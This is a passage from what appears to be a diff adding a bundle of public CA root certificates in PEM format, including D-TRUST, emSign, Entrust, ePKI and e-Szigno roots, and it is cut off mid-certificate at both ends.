+cI1QcB9WbMy5/zpaT2N6w25lBx2Eof+pDGOJbbJAiDnXH3dotfyc1dZnaVuodNv8 +ifYbMvekJKZ2t0dT741Jj6m2g1qllpBFYfXeA08mD6iL8AOWsKwV0HFaanuU5nCT +2vFp4LJiTZ6P/4mdm13NRemUAiKN4DV/6PEEeXFsVIP4M7kFMhtYVRFP0OUnR3Hs +7dpn1mKmS00PaaLJvOwiS5THaJQXfuKOKD62xur1NGyfN4gHONuGcfrNlUhDbqNP +gofXNJhuS5N5YHVpD/Aa1VP6IQzCP+k/HxiMkl14p3ZnGbuy6n/pcAlWVqOwDAst +Nl7F6cTVg8uGF5csbBNvh1qvSaYd2804BC5f4ko1Di1L+KIkBI3Y4WNeApI02phh +XBxvWHZks/wCuPWdCg== +-----END CERTIFICATE----- + +# D-TRUST Root Class 3 CA 2 2009 +-----BEGIN CERTIFICATE----- +MIIEMzCCAxugAwIBAgIDCYPzMA0GCSqGSIb3DQEBCwUAME0xCzAJBgNVBAYTAkRF +MRUwEwYDVQQKDAxELVRydXN0IEdtYkgxJzAlBgNVBAMMHkQtVFJVU1QgUm9vdCBD +bGFzcyAzIENBIDIgMjAwOTAeFw0wOTExMDUwODM1NThaFw0yOTExMDUwODM1NTha +ME0xCzAJBgNVBAYTAkRFMRUwEwYDVQQKDAxELVRydXN0IEdtYkgxJzAlBgNVBAMM +HkQtVFJVU1QgUm9vdCBDbGFzcyAzIENBIDIgMjAwOTCCASIwDQYJKoZIhvcNAQEB +BQADggEPADCCAQoCggEBANOySs96R+91myP6Oi/WUEWJNTrGa9v+2wBoqOADER03 +UAifTUpolDWzU9GUY6cgVq/eUXjsKj3zSEhQPgrfRlWLJ23DEE0NkVJD2IfgXU42 +tSHKXzlABF9bfsyjxiupQB7ZNoTWSPOSHjRGICTBpFGOShrvUD9pXRl/RcPHAY9R +ySPocq60vFYJfxLLHLGvKZAKyVXMD9O0Gu1HNVpK7ZxzBCHQqr0ME7UAyiZsxGsM +lFqVlNpQmvH/pStmMaTJOKDfHR+4CS7zp+hnUquVH+BGPtikw8paxTGA6Eian5Rp +/hnd2HN8gcqW3o7tszIFZYQ05ub9VxC1X3a/L7AQDcUCAwEAAaOCARowggEWMA8G +A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFP3aFMSfMN4hvR5COfyrYyNJ4PGEMA4G +A1UdDwEB/wQEAwIBBjCB0wYDVR0fBIHLMIHIMIGAoH6gfIZ6bGRhcDovL2RpcmVj +dG9yeS5kLXRydXN0Lm5ldC9DTj1ELVRSVVNUJTIwUm9vdCUyMENsYXNzJTIwMyUy +MENBJTIwMiUyMDIwMDksTz1ELVRydXN0JTIwR21iSCxDPURFP2NlcnRpZmljYXRl +cmV2b2NhdGlvbmxpc3QwQ6BBoD+GPWh0dHA6Ly93d3cuZC10cnVzdC5uZXQvY3Js +L2QtdHJ1c3Rfcm9vdF9jbGFzc18zX2NhXzJfMjAwOS5jcmwwDQYJKoZIhvcNAQEL +BQADggEBAH+X2zDI36ScfSF6gHDOFBJpiBSVYEQBrLLpME+bUMJm2H6NMLVwMeni +acfzcNsgFYbQDfC+rAF1hM5+n02/t2A7nPPKHeJeaNijnZflQGDSNiH+0LS4F9p0 +o3/U37CYAqxva2ssJSRyoWXuJVrl5jLn8t+rSfrzkGkj2wTZ51xY/GXUl77M/C4K +zCUqNQT4YJEVdT1B/yMfGchs64JTBKbkTCJNjYy6zltz7GRUUG3RnFX7acM2w4y8 +PIWmawomDeCTmGCufsYkl4phX5GOZpIJhzbNi5stPvZR1FDUWSi9g/LMKHtThm3Y +Johw1+qRzT65ysCQblrGXnRl11z+o+I= +-----END CERTIFICATE----- + +# D-TRUST Root Class 3 CA 2 EV 2009 +-----BEGIN CERTIFICATE----- +MIIEQzCCAyugAwIBAgIDCYP0MA0GCSqGSIb3DQEBCwUAMFAxCzAJBgNVBAYTAkRF +MRUwEwYDVQQKDAxELVRydXN0IEdtYkgxKjAoBgNVBAMMIUQtVFJVU1QgUm9vdCBD +bGFzcyAzIENBIDIgRVYgMjAwOTAeFw0wOTExMDUwODUwNDZaFw0yOTExMDUwODUw +NDZaMFAxCzAJBgNVBAYTAkRFMRUwEwYDVQQKDAxELVRydXN0IEdtYkgxKjAoBgNV +BAMMIUQtVFJVU1QgUm9vdCBDbGFzcyAzIENBIDIgRVYgMjAwOTCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBAJnxhDRwui+3MKCOvXwEz75ivJn9gpfSegpn +ljgJ9hBOlSJzmY3aFS3nBfwZcyK3jpgAvDw9rKFs+9Z5JUut8Mxk2og+KbgPCdM0 +3TP1YtHhzRnp7hhPTFiu4h7WDFsVWtg6uMQYZB7jM7K1iXdODL/ZlGsTl28So/6Z +qQTMFexgaDbtCHu39b+T7WYxg4zGcTSHThfqr4uRjRxWQa4iN1438h3Z0S0NL2lR +p75mpoo6Kr3HGrHhFPC+Oh25z1uxav60sUYgovseO3Dvk5h9jHOW8sXvhXCtKSb8 +HgQ+HKDYD8tSg2J87otTlZCpV6LqYQXY+U3EJ/pure3511H3a6UCAwEAAaOCASQw +ggEgMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFNOUikxiEyoZLsyvcop9Ntea +HNxnMA4GA1UdDwEB/wQEAwIBBjCB3QYDVR0fBIHVMIHSMIGHoIGEoIGBhn9sZGFw +Oi8vZGlyZWN0b3J5LmQtdHJ1c3QubmV0L0NOPUQtVFJVU1QlMjBSb290JTIwQ2xh +c3MlMjAzJTIwQ0ElMjAyJTIwRVYlMjAyMDA5LE89RC1UcnVzdCUyMEdtYkgsQz1E +RT9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0MEagRKBChkBodHRwOi8vd3d3LmQt +dHJ1c3QubmV0L2NybC9kLXRydXN0X3Jvb3RfY2xhc3NfM19jYV8yX2V2XzIwMDku +Y3JsMA0GCSqGSIb3DQEBCwUAA4IBAQA07XtaPKSUiO8aEXUHL7P+PPoeUSbrh/Yp +3uDx1MYkCenBz1UbtDDZzhr+BlGmFaQt77JLvyAoJUnRpjZ3NOhk31KxEcdzes05 +nsKtjHEh8lprr988TlWvsoRlFIm5d8sqMb7Po23Pb0iUMkZv53GMoKaEGTcH8gNF +CSuGdXzfX2lXANtu2KZyIktQ1HWYVt+3GP9DQ1CuekR78HlR10M9p9OB0/DJT7na +xpeG0ILD5EJt/rDiZE4OJudANCa1CInXCGNjOCd1HjPqbqjdn5lPdE2BiYBL3ZqX +KVwvvoFBuYz/6n1gBp7N1z3TLqMVvKjmJuVvw9y4AyHqnxbxLFS1 +-----END CERTIFICATE----- + +# emSign ECC Root CA - C3 +-----BEGIN CERTIFICATE----- +MIICKzCCAbGgAwIBAgIKe3G2gla4EnycqDAKBggqhkjOPQQDAzBaMQswCQYDVQQG +EwJVUzETMBEGA1UECxMKZW1TaWduIFBLSTEUMBIGA1UEChMLZU11ZGhyYSBJbmMx +IDAeBgNVBAMTF2VtU2lnbiBFQ0MgUm9vdCBDQSAtIEMzMB4XDTE4MDIxODE4MzAw +MFoXDTQzMDIxODE4MzAwMFowWjELMAkGA1UEBhMCVVMxEzARBgNVBAsTCmVtU2ln +biBQS0kxFDASBgNVBAoTC2VNdWRocmEgSW5jMSAwHgYDVQQDExdlbVNpZ24gRUND +IFJvb3QgQ0EgLSBDMzB2MBAGByqGSM49AgEGBSuBBAAiA2IABP2lYa57JhAd6bci +MK4G9IGzsUJxlTm801Ljr6/58pc1kjZGDoeVjbk5Wum739D+yAdBPLtVb4Ojavti +sIGJAnB9SMVK4+kiVCJNk7tCDK93nCOmfddhEc5lx/h//vXyqaNCMEAwHQYDVR0O +BBYEFPtaSNCAIEDyqOkAB2kZd6fmw/TPMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMB +Af8EBTADAQH/MAoGCCqGSM49BAMDA2gAMGUCMQC02C8Cif22TGK6Q04ThHK1rt0c +3ta13FaPWEBaLd4gTCKDypOofu4SQMfWh0/434UCMBwUZOR8loMRnLDRWmFLpg9J +0wD8ofzkpf9/rdcw0Md3f76BB1UwUCAU9Vc4CqgxUQ== +-----END CERTIFICATE----- + +# emSign ECC Root CA - G3 +-----BEGIN CERTIFICATE----- +MIICTjCCAdOgAwIBAgIKPPYHqWhwDtqLhDAKBggqhkjOPQQDAzBrMQswCQYDVQQG +EwJJTjETMBEGA1UECxMKZW1TaWduIFBLSTElMCMGA1UEChMcZU11ZGhyYSBUZWNo +bm9sb2dpZXMgTGltaXRlZDEgMB4GA1UEAxMXZW1TaWduIEVDQyBSb290IENBIC0g +RzMwHhcNMTgwMjE4MTgzMDAwWhcNNDMwMjE4MTgzMDAwWjBrMQswCQYDVQQGEwJJ +TjETMBEGA1UECxMKZW1TaWduIFBLSTElMCMGA1UEChMcZU11ZGhyYSBUZWNobm9s +b2dpZXMgTGltaXRlZDEgMB4GA1UEAxMXZW1TaWduIEVDQyBSb290IENBIC0gRzMw +djAQBgcqhkjOPQIBBgUrgQQAIgNiAAQjpQy4LRL1KPOxst3iAhKAnjlfSU2fySU0 +WXTsuwYc58Byr+iuL+FBVIcUqEqy6HyC5ltqtdyzdc6LBtCGI79G1Y4PPwT01xyS +fvalY8L1X44uT6EYGQIrMgqCZH0Wk9GjQjBAMB0GA1UdDgQWBBR8XQKEE9TMipuB +zhccLikenEhjQjAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAKBggq +hkjOPQQDAwNpADBmAjEAvvNhzwIQHWSVB7gYboiFBS+DCBeQyh+KTOgNG3qxrdWB +CUfvO6wIBHxcmbHtRwfSAjEAnbpV/KlK6O3t5nYBQnvI+GDZjVGLVTv7jHvrZQnD ++JbNR6iC8hZVdyR+EhCVBCyj +-----END CERTIFICATE----- + +# emSign Root CA - C1 +-----BEGIN CERTIFICATE----- +MIIDczCCAlugAwIBAgILAK7PALrEzzL4Q7IwDQYJKoZIhvcNAQELBQAwVjELMAkG +A1UEBhMCVVMxEzARBgNVBAsTCmVtU2lnbiBQS0kxFDASBgNVBAoTC2VNdWRocmEg +SW5jMRwwGgYDVQQDExNlbVNpZ24gUm9vdCBDQSAtIEMxMB4XDTE4MDIxODE4MzAw +MFoXDTQzMDIxODE4MzAwMFowVjELMAkGA1UEBhMCVVMxEzARBgNVBAsTCmVtU2ln +biBQS0kxFDASBgNVBAoTC2VNdWRocmEgSW5jMRwwGgYDVQQDExNlbVNpZ24gUm9v +dCBDQSAtIEMxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz+upufGZ +BczYKCFK83M0UYRWEPWgTywS4/oTmifQz/l5GnRfHXk5/Fv4cI7gklL35CX5VIPZ +HdPIWoU/Xse2B+4+wM6ar6xWQio5JXDWv7V7Nq2s9nPczdcdioOl+yuQFTdrHCZH +3DspVpNqs8FqOp099cGXOFgFixwR4+S0uF2FHYP+eF8LRWgYSKVGczQ7/g/IdrvH +GPMF0Ybzhe3nudkyrVWIzqa2kbBPrH4VI5b2P/AgNBbeCsbEBEV5f6f9vtKppa+c +xSMq9zwhbL2vj07FOrLzNBL834AaSaTUqZX3noleoomslMuoaJuvimUnzYnu3Yy1 +aylwQ6BpC+S5DwIDAQABo0IwQDAdBgNVHQ4EFgQU/qHgcB4qAzlSWkK+XJGFehiq +TbUwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL +BQADggEBAMJKVvoVIXsoounlHfv4LcQ5lkFMOycsxGwYFYDGrK9HWS8mC+M2sO87 +/kOXSTKZEhVb3xEp/6tT+LvBeA+snFOvV71ojD1pM/CjoCNjO2RnIkSt1XHLVip4 +kqNPEjE2NuLe/gDEo2APJ62gsIq1NnpSob0n9CAnYuhNlCQT5AoE6TyrLshDCUrG +YQTlSTR+08TI9Q/Aqum6VF7zYytPT1DU/rl7mYw9wC68AivTxEDkigcxHpvOJpkT ++xHqmiIMERnHXhuBUDDIlhJu58tBf5E7oke3VIAb3ADMmpDqw8NQBmIMMMAVSKeo +WXzhriKi4gp6D/piq1JM4fHfyr6DDUI= +-----END CERTIFICATE----- + +# emSign Root CA - G1 +-----BEGIN CERTIFICATE----- +MIIDlDCCAnygAwIBAgIKMfXkYgxsWO3W2DANBgkqhkiG9w0BAQsFADBnMQswCQYD +VQQGEwJJTjETMBEGA1UECxMKZW1TaWduIFBLSTElMCMGA1UEChMcZU11ZGhyYSBU +ZWNobm9sb2dpZXMgTGltaXRlZDEcMBoGA1UEAxMTZW1TaWduIFJvb3QgQ0EgLSBH +MTAeFw0xODAyMTgxODMwMDBaFw00MzAyMTgxODMwMDBaMGcxCzAJBgNVBAYTAklO +MRMwEQYDVQQLEwplbVNpZ24gUEtJMSUwIwYDVQQKExxlTXVkaHJhIFRlY2hub2xv +Z2llcyBMaW1pdGVkMRwwGgYDVQQDExNlbVNpZ24gUm9vdCBDQSAtIEcxMIIBIjAN +BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAk0u76WaK7p1b1TST0Bsew+eeuGQz +f2N4aLTNLnF115sgxk0pvLZoYIr3IZpWNVrzdr3YzZr/k1ZLpVkGoZM0Kd0WNHVO +8oG0x5ZOrRkVUkr+PHB1cM2vK6sVmjM8qrOLqs1D/fXqcP/tzxE7lM5OMhbTI0Aq +d7OvPAEsbO2ZLIvZTmmYsvePQbAyeGHWDV/D+qJAkh1cF+ZwPjXnorfCYuKrpDhM +tTk1b+oDafo6VGiFbdbyL0NVHpENDtjVaqSW0RM8LHhQ6DqS0hdW5TUaQBw+jSzt +Od9C4INBdN+jzcKGYEho42kLVACL5HZpIQ15TjQIXhTCzLG3rdd8cIrHhQIDAQAB +o0IwQDAdBgNVHQ4EFgQU++8Nhp6w492pufEhF38+/PB3KxowDgYDVR0PAQH/BAQD +AgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAFn/8oz1h31x +PaOfG1vR2vjTnGs2vZupYeveFix0PZ7mddrXuqe8QhfnPZHr5X3dPpzxz5KsbEjM +wiI/aTvFthUvozXGaCocV685743QNcMYDHsAVhzNixl03r4PEuDQqqE/AjSxcM6d +GNYIAwlG7mDgfrbESQRRfXBgvKqy/3lyeqYdPV8q+Mri/Tm3R7nrft8EI6/6nAYH +6ftjk4BAtcZsCjEozgyfz7MjNYBBjWzEN3uBL4ChQEKF6dk4jeihU80Bv2noWgby +RQuQ+q7hv53yrlc8pa6yVvSLZUDp/TGBLPQ5Cdjua6e0ph0VpZj3AYHYhX3zUVxx +iN66zB+Afko= +-----END CERTIFICATE----- + +# Entrust.net Premium 2048 Secure Server CA +-----BEGIN CERTIFICATE----- +MIIEKjCCAxKgAwIBAgIEOGPe+DANBgkqhkiG9w0BAQUFADCBtDEUMBIGA1UEChML +RW50cnVzdC5uZXQxQDA+BgNVBAsUN3d3dy5lbnRydXN0Lm5ldC9DUFNfMjA0OCBp +bmNvcnAuIGJ5IHJlZi4gKGxpbWl0cyBsaWFiLikxJTAjBgNVBAsTHChjKSAxOTk5 +IEVudHJ1c3QubmV0IExpbWl0ZWQxMzAxBgNVBAMTKkVudHJ1c3QubmV0IENlcnRp +ZmljYXRpb24gQXV0aG9yaXR5ICgyMDQ4KTAeFw05OTEyMjQxNzUwNTFaFw0yOTA3 +MjQxNDE1MTJaMIG0MRQwEgYDVQQKEwtFbnRydXN0Lm5ldDFAMD4GA1UECxQ3d3d3 +LmVudHJ1c3QubmV0L0NQU18yMDQ4IGluY29ycC4gYnkgcmVmLiAobGltaXRzIGxp +YWIuKTElMCMGA1UECxMcKGMpIDE5OTkgRW50cnVzdC5uZXQgTGltaXRlZDEzMDEG +A1UEAxMqRW50cnVzdC5uZXQgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgKDIwNDgp +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArU1LqRKGsuqjIAcVFmQq +K0vRvwtKTY7tgHalZ7d4QMBzQshowNtTK91euHaYNZOLGp18EzoOH1u3Hs/lJBQe +sYGpjX24zGtLA/ECDNyrpUAkAH90lKGdCCmziAv1h3edVc3kw37XamSrhRSGlVuX +MlBvPci6Zgzj/L24ScF2iUkZ/cCovYmjZy/Gn7xxGWC4LeksyZB2ZnuU4q941mVT +XTzWnLLPKQP5L6RQstRIzgUyVYr9smRMDuSYB3Xbf9+5CFVghTAp+XtIpGmG4zU/ +HoZdenoVve8AjhUiVBcAkCaTvA5JaJG/+EfTnZVCwQ5N328mz8MYIWJmQ3DW1cAH +4QIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNV +HQ4EFgQUVeSB0RGAvtiJuQijMfmhJAkWuXAwDQYJKoZIhvcNAQEFBQADggEBADub +j1abMOdTmXx6eadNl9cZlZD7Bh/KM3xGY4+WZiT6QBshJ8rmcnPyT/4xmf3IDExo +U8aAghOY+rat2l098c5u9hURlIIM7j+VrxGrD9cv3h8Dj1csHsm7mhpElesYT6Yf +zX1XEC+bBAlahLVu2B064dae0Wx5XnkcFMXj0EyTO2U87d89vqbllRrDtRnDvV5b +u/8j72gZyxKTJ1wDLW8w0B62GqzeWvfRqqgnpv55gcR5mTNXuhKwqeBCbJPKVt7+ +bYQLCIt+jerXmCHG8+c8eS9enNFMFY3h7CI3zJpDC5fcgJCNs2ebb0gIFVbPv/Er +fF6adulZkMV8gzURZVE= +-----END CERTIFICATE----- + +# Entrust Root Certification Authority +-----BEGIN CERTIFICATE----- +MIIEkTCCA3mgAwIBAgIERWtQVDANBgkqhkiG9w0BAQUFADCBsDELMAkGA1UEBhMC +VVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xOTA3BgNVBAsTMHd3dy5lbnRydXN0 +Lm5ldC9DUFMgaXMgaW5jb3Jwb3JhdGVkIGJ5IHJlZmVyZW5jZTEfMB0GA1UECxMW +KGMpIDIwMDYgRW50cnVzdCwgSW5jLjEtMCsGA1UEAxMkRW50cnVzdCBSb290IENl +cnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTA2MTEyNzIwMjM0MloXDTI2MTEyNzIw +NTM0MlowgbAxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMTkw +NwYDVQQLEzB3d3cuZW50cnVzdC5uZXQvQ1BTIGlzIGluY29ycG9yYXRlZCBieSBy +ZWZlcmVuY2UxHzAdBgNVBAsTFihjKSAyMDA2IEVudHJ1c3QsIEluYy4xLTArBgNV +BAMTJEVudHJ1c3QgUm9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCCASIwDQYJ +KoZIhvcNAQEBBQADggEPADCCAQoCggEBALaVtkNC+sZtKm9I35RMOVcF7sN5EUFo +Nu3s/poBj6E4KPz3EEZmLk0eGrEaTsbRwJWIsMn/MYszA9u3g3s+IIRe7bJWKKf4 +4LlAcTfFy0cOlypowCKVYhXbR9n10Cv/gkvJrT7eTNuQgFA/CYqEAOwwCj0Yzfv9 +KlmaI5UXLEWeH25DeW0MXJj+SKfFI0dcXv1u5x609mhF0YaDW6KKjbHjKYD+JXGI +rb68j6xSlkuqUY3kEzEZ6E5Nn9uss2rVvDlUccp6en+Q3X0dgNmBu1kmwhH+5pPi +94DkZfs0Nw4pgHBNrziGLp5/V6+eF67rHMsoIV+2HNjnogQi+dPa2MsCAwEAAaOB +sDCBrTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zArBgNVHRAEJDAi +gA8yMDA2MTEyNzIwMjM0MlqBDzIwMjYxMTI3MjA1MzQyWjAfBgNVHSMEGDAWgBRo +kORnpKZTgMeGZqTx90tD+4S9bTAdBgNVHQ4EFgQUaJDkZ6SmU4DHhmak8fdLQ/uE +vW0wHQYJKoZIhvZ9B0EABBAwDhsIVjcuMTo0LjADAgSQMA0GCSqGSIb3DQEBBQUA +A4IBAQCT1DCw1wMgKtD5Y+iRDAUgqV8ZyntyTtSx29CW+1RaGSwMCPeyvIWonX9t +O1KzKtvn1ISMY/YPyyYBkVBs9F8U4pN0wBOeMDpQ47RgxRzwIkSNcUesyBrJ6Zua +AGAT/3B+XxFNSRuzFVJ7yVTav52Vr2ua2J7p8eRDjeIRRDq/r72DQnNSi6q7pynP +9WQcCk3RvKqsnyrQ/39/2n3qse0wJcGE2jTSW3iDVuycNsMm4hH2Z0kdkquM++v/ +eu6FSqdQgPCnXEqULl8FmTxSQeDNtGPPAUO6nIPcj2A781q0tHuu2guQOHXvgR1m +0vdXcDazv/wor3ElhVsT/h5/WrQ8 +-----END CERTIFICATE----- + +# Entrust Root Certification Authority - EC1 +-----BEGIN CERTIFICATE----- +MIIC+TCCAoCgAwIBAgINAKaLeSkAAAAAUNCR+TAKBggqhkjOPQQDAzCBvzELMAkG +A1UEBhMCVVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3 +d3cuZW50cnVzdC5uZXQvbGVnYWwtdGVybXMxOTA3BgNVBAsTMChjKSAyMDEyIEVu +dHJ1c3QsIEluYy4gLSBmb3IgYXV0aG9yaXplZCB1c2Ugb25seTEzMDEGA1UEAxMq +RW50cnVzdCBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRUMxMB4XDTEy +MTIxODE1MjUzNloXDTM3MTIxODE1NTUzNlowgb8xCzAJBgNVBAYTAlVTMRYwFAYD +VQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQLEx9TZWUgd3d3LmVudHJ1c3QubmV0 +L2xlZ2FsLXRlcm1zMTkwNwYDVQQLEzAoYykgMjAxMiBFbnRydXN0LCBJbmMuIC0g +Zm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxMzAxBgNVBAMTKkVudHJ1c3QgUm9vdCBD +ZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEVDMTB2MBAGByqGSM49AgEGBSuBBAAi +A2IABIQTydC6bUF74mzQ61VfZgIaJPRbiWlH47jCffHyAsWfoPZb1YsGGYZPUxBt +ByQnoaD41UcZYUx9ypMn6nQM72+WCf5j7HBdNq1nd67JnXxVRDqiY1Ef9eNi1KlH +Bz7MIKNCMEAwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0O +BBYEFLdj5xrdjekIplWDpOBqUEFlEUJJMAoGCCqGSM49BAMDA2cAMGQCMGF52OVC +R98crlOZF7ZvHH3hvxGU0QOIdeSNiaSKd0bebWHvAvX7td/M/k7//qnmpwIwW5nX +hTcGtXsI/esni0qU+eH6p44mCOh8kmhtc9hvJqwhAriZtyZBWyVgrtBIGu4G +-----END CERTIFICATE----- + +# Entrust Root Certification Authority - G2 +-----BEGIN CERTIFICATE----- +MIIEPjCCAyagAwIBAgIESlOMKDANBgkqhkiG9w0BAQsFADCBvjELMAkGA1UEBhMC +VVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3d3cuZW50 +cnVzdC5uZXQvbGVnYWwtdGVybXMxOTA3BgNVBAsTMChjKSAyMDA5IEVudHJ1c3Qs +IEluYy4gLSBmb3IgYXV0aG9yaXplZCB1c2Ugb25seTEyMDAGA1UEAxMpRW50cnVz +dCBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzIwHhcNMDkwNzA3MTcy +NTU0WhcNMzAxMjA3MTc1NTU0WjCBvjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUVu +dHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3d3cuZW50cnVzdC5uZXQvbGVnYWwt +dGVybXMxOTA3BgNVBAsTMChjKSAyMDA5IEVudHJ1c3QsIEluYy4gLSBmb3IgYXV0 +aG9yaXplZCB1c2Ugb25seTEyMDAGA1UEAxMpRW50cnVzdCBSb290IENlcnRpZmlj +YXRpb24gQXV0aG9yaXR5IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK +AoIBAQC6hLZy254Ma+KZ6TABp3bqMriVQRrJ2mFOWHLP/vaCeb9zYQYKpSfYs1/T +RU4cctZOMvJyig/3gxnQaoCAAEUesMfnmr8SVycco2gvCoe9amsOXmXzHHfV1IWN +cCG0szLni6LVhjkCsbjSR87kyUnEO6fe+1R9V77w6G7CebI6C1XiUJgWMhNcL3hW +wcKUs/Ja5CeanyTXxuzQmyWC48zCxEXFjJd6BmsqEZ+pCm5IO2/b1BEZQvePB7/1 +U1+cPvQXLOZprE4yTGJ36rfo5bs0vBmLrpxR57d+tVOxMyLlbc9wPBr64ptntoP0 +jaWvYkxN4FisZDQSA/i2jZRjJKRxAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAP +BgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBRqciZ60B7vfec7aVHUbI2fkBJmqzAN +BgkqhkiG9w0BAQsFAAOCAQEAeZ8dlsa2eT8ijYfThwMEYGprmi5ZiXMRrEPR9RP/ +jTkrwPK9T3CMqS/qF8QLVJ7UG5aYMzyorWKiAHarWWluBh1+xLlEjZivEtRh2woZ +Rkfz6/djwUAFQKXSt/S1mja/qYh2iARVBCuch38aNzx+LaUa2NSJXsq9rD1s2G2v +1fN2D807iDginWyTmsQ9v4IbZT+mD12q/OWyFcq1rca8PdCE6OoGcrBNOTJ4vz4R +nAuknZoh8/CbCzB428Hch0P+vGOaysXCHMnHjf87ElgI5rY97HosTvuDls4MPGmH +VHOkc8KT/1EQrBVUAdj8BbGJoX90g5pJ19xOe4pIb4tF9g== +-----END CERTIFICATE----- + +# ePKI Root Certification Authority +-----BEGIN CERTIFICATE----- +MIIFsDCCA5igAwIBAgIQFci9ZUdcr7iXAF7kBtK8nTANBgkqhkiG9w0BAQUFADBe +MQswCQYDVQQGEwJUVzEjMCEGA1UECgwaQ2h1bmdod2EgVGVsZWNvbSBDby4sIEx0 +ZC4xKjAoBgNVBAsMIWVQS0kgUm9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAe +Fw0wNDEyMjAwMjMxMjdaFw0zNDEyMjAwMjMxMjdaMF4xCzAJBgNVBAYTAlRXMSMw +IQYDVQQKDBpDaHVuZ2h3YSBUZWxlY29tIENvLiwgTHRkLjEqMCgGA1UECwwhZVBL +SSBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5MIICIjANBgkqhkiG9w0BAQEF +AAOCAg8AMIICCgKCAgEA4SUP7o3biDN1Z82tH306Tm2d0y8U82N0ywEhajfqhFAH +SyZbCUNsIZ5qyNUD9WBpj8zwIuQf5/dqIjG3LBXy4P4AakP/h2XGtRrBp0xtInAh +ijHyl3SJCRImHJ7K2RKilTza6We/CKBk49ZCt0Xvl/T29de1ShUCWH2YWEtgvM3X +DZoTM1PRYfl61dd4s5oz9wCGzh1NlDivqOx4UXCKXBCDUSH3ET00hl7lSM2XgYI1 +TBnsZfZrxQWh7kcT1rMhJ5QQCtkkO7q+RBNGMD+XPNjX12ruOzjjK9SXDrkb5wdJ +fzcq+Xd4z1TtW0ado4AOkUPB1ltfFLqfpo0kR0BZv3I4sjZsN/+Z0V0OWQqraffA +sgRFelQArr5T9rXn4fg8ozHSqf4hUmTFpmfwdQcGlBSBVcYn5AGPF8Fqcde+S/uU +WH1+ETOxQvdibBjWzwloPn9s9h6PYq2lY9sJpx8iQkEeb5mKPtf5P0B6ebClAZLS +nT0IFaUQAS2zMnaolQ2zepr7BxB4EW/hj8e6DyUadCrlHJhBmd8hh+iVBmoKs2pH +dmX2Os+PYhcZewoozRrSgx4hxyy/vv9haLdnG7t4TY3OZ+XkwY63I2binZB1NJip +NiuKmpS5nezMirH4JYlcWrYvjB9teSSnUmjDhDXiZo1jDiVN1Rmy5nk3pyKdVDEC +AwEAAaNqMGgwHQYDVR0OBBYEFB4M97Zn8uGSJglFwFU5Lnc/QkqiMAwGA1UdEwQF +MAMBAf8wOQYEZyoHAAQxMC8wLQIBADAJBgUrDgMCGgUAMAcGBWcqAwAABBRFsMLH +ClZ87lt4DJX5GFPBphzYEDANBgkqhkiG9w0BAQUFAAOCAgEACbODU1kBPpVJufGB +uvl2ICO1J2B01GqZNF5sAFPZn/KmsSQHRGoqxqWOeBLoR9lYGxMqXnmbnwoqZ6Yl +PwZpVnPDimZI+ymBV3QGypzqKOg4ZyYr8dW1P2WT+DZdjo2NQCCHGervJ8A9tDkP +JXtoUHRVnAxZfVo9QZQlUgjgRywVMRnVvwdVxrsStZf0X4OFunHB2WyBEXYKCrC/ +gpf36j36+uwtqSiUO1bd0lEursC9CBWMd1I0ltabrNMdjmEPNXubrjlpC2JgQCA2 +j6/7Nu4tCEoduL+bXPjqpRugc6bY+G7gMwRfaKonh+3ZwZCc7b3jajWvY9+rGNm6 +5ulK6lCKD2GTHuItGeIwlDWSXQ62B68ZgI9HkFFLLk3dheLSClIKF5r8GrBQAuUB +o2M3IUxExJtRmREOc5wGj1QupyheRDmHVi03vYVElOEMSyycw5KFNGHLD7ibSkNS +/jQ6fbjpKdx2qcgw+BRxgMYeNkh0IkFch4LoGHGLQYlE535YW6i4jRPpp2zDR+2z +Gp1iro2C6pSe3VkQw63d4k3jMdXH7OjysP6SHhYKGvzZ8/gntsm+HbRsZJB/9OTE +W9c3rkIO3aQab3yIVMUWbuF6aC74Or8NpDyJO3inTmODBCEIZ43ygknQW/2xzQ+D +hNQ+IIX3Sj0rnP0qCglN6oH4EZw= +-----END CERTIFICATE----- + +# e-Szigno Root CA 2017 +-----BEGIN CERTIFICATE----- +MIICQDCCAeWgAwIBAgIMAVRI7yH9l1kN9QQKMAoGCCqGSM49BAMCMHExCzAJBgNV 